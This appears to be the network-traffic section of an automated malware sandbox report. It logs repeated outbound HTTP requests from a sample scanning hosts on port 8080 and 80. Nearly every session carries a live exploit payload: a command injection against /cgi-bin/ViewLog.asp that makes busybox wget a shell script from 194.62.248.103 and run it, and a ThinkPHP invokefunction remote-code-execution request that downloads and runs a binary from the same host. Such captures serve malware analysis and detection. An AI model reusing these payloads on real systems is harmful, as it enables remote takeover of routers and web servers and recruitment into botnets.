                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:01.317487001 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:08.996393919 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:24.354351997 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:56.349790096 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7192.168.2.233763231.48.254.1148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:54.466041088 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8192.168.2.233851095.96.87.148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:54.480881929 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:34:54.818582058 CEST376INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 16:34:52 GMT
                                                        Server: DNVRS-Webs
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9192.168.2.236035285.95.177.458080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:54.507093906 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10192.168.2.234021494.122.4.2478080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:54.509897947 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11192.168.2.233665494.120.24.2148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:54.510044098 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12192.168.2.233747631.200.113.1068080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.203536034 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13192.168.2.234668631.200.31.908080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.205892086 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14192.168.2.234217094.121.201.1938080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.210319042 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15192.168.2.235058694.123.6.1848080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.211024046 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16192.168.2.235618294.122.17.718080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.211244106 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17192.168.2.233450894.123.188.718080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.213349104 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18192.168.2.235638094.123.186.1438080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.213392973 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19192.168.2.235469031.187.255.2378080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.509565115 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:34:56.818614960 CEST193INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html
                                                        Server: CherryPy/18.8.0
                                                        Date: Sun, 14 Apr 2024 14:34:53 GMT
                                                        Vary: Accept-Encoding
                                                        Content-Encoding: gzip
                                                        Content-Length: 174


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20192.168.2.235295231.136.228.738080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.518053055 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:34:57.477957010 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:34:59.397696972 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:03.365272045 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:11.044264078 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:26.401945114 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:58.397536993 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21192.168.2.234367894.121.116.638080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.555896997 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22192.168.2.235985295.170.74.15080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.688374043 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:34:56.984693050 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:34:56 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23192.168.2.235347895.216.100.19680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:56.708580017 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:34:57.031095982 CEST502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:34:56 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
